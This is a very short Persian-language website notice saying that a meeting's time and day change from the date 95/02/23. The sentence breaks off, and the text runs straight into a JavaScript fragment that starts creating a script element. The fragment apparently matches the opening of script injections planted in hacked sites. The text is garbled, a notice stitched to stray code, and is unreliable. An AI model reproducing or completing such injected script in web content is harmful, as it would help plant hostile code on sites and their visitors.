ساعت و روز جلسه تغییر می کند

از تاریخ 95/02/23 …var d=document;var s=d.createElement(‘script’);